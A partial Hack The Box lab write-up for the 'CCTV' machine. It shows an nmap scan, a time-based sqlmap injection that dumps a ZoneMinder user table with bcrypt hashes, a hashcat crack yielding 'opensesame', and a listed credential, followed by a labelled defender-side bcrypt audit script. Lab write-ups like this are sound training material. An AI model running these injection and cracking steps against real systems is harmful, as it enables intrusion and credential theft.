Hack The Box · Lab
CCTV
IP: 10.129.5.47 | Difficulty: Easy | OS: Linux
Environment Setup
export IP=10.129.5.47
export VPN=10.10.15.246
echo "10.129.5.47 cctv.htb" | sudo tee -a /etc/hosts
Step 1 — Port Scanning
Why: Map the attack surface. Open ports and services determine which attack angles are available.
nmap -sCV -p- --min-rate 5000 $IP -oN scans/nmap_cctv.out
Output
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 76:1d:73:98:fa:05:f7:0b:04:c2:3b:c4:7d:e6:db:4a (ECDSA)
|_ 256 e3:9b:38:08:9a:d7:e9:d1:94:11:ff:50:80:bc:f2:59 (ED25519)
80/tcp open http Apache httpd 2.4.58
|_http-title: SecureVision CCTV & Security Solutions
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Dumping the Users table of the zm database with sqlmap (time-based technique on the tid parameter)
sqlmap -r req.txt -p "tid" --batch --technique=T --dump -D zm -T Users -C Username,Password
Output
+------------+--------------------------------------------------------------+
| Username | Password |
+------------+--------------------------------------------------------------+
| superadmin | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| mark | $2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
| admin | $2y$10$t5z8uIT.n9uCdHCNidcLf.39T1Ui9nrlCkdXrzJMnJgkTiAvRUM6m |
+------------+--------------------------------------------------------------+
Cracking mark's hash with hashcat (mode 3200, bcrypt)
hashcat -m 3200 '$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG.' /Users/nrg/Downloads/rockyou.txt
$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG.:opensesame
sa_mark : X1l9fx1ZjS7RZb
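Defender's view of the dumped hashes, as an added example that is not part of the original writeup: a parser for the bcrypt strings shown above that reads the cost factor out of each stored hash and flags entries below a policy minimum. The function names and the minimum cost of 12 are assumptions made for this example.

```python
import re
from typing import NamedTuple, Optional

# bcrypt modular-crypt layout: $<variant>$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r"\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})"
)

class BcryptHash(NamedTuple):
    variant: str   # "2y" is the prefix PHP's password_hash() emits
    cost: int      # log2 of the key-expansion rounds
    salt: str
    digest: str

def parse_bcrypt(value: str) -> Optional[BcryptHash]:
    """Split a stored hash into its fields, or return None if malformed."""
    m = BCRYPT_RE.fullmatch(value.strip())
    if m is None or not 4 <= int(m.group(2)) <= 31:
        return None
    return BcryptHash(m.group(1), int(m.group(2)), m.group(3), m.group(4))

def audit_hashes(rows, min_cost=12):
    """rows: (username, stored_hash) pairs. min_cost=12 is an assumed policy."""
    findings = []
    for user, stored in rows:
        parsed = parse_bcrypt(stored)
        if parsed is None:
            findings.append((user, "not a well-formed bcrypt hash"))
        elif parsed.cost < min_cost:
            factor = 2 ** (min_cost - parsed.cost)
            findings.append(
                (user, f"cost {parsed.cost} is below {min_cost}: "
                       f"each guess is {factor}x cheaper than policy")
            )
    return findings

if __name__ == "__main__":
    rows = [
        # Hash for "mark" as shown in the sqlmap output above.
        ("mark", "$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG."),
        # Constructed malformed value (truncated digest).
        ("legacy", "$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0"),
    ]
    for user, finding in audit_hashes(rows):
        print(f"{user}: {finding}")
```

A higher cost only slows each guess; it does not protect a password that appears in a common wordlist, as the hashcat result above shows. Screening new passwords against known-breached lists when they are set is the complementary control.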
—
Writeup restricted
This machine is currently active. The full writeup will be published once the box retires, in accordance with HTB's NDA policy.
Status — Active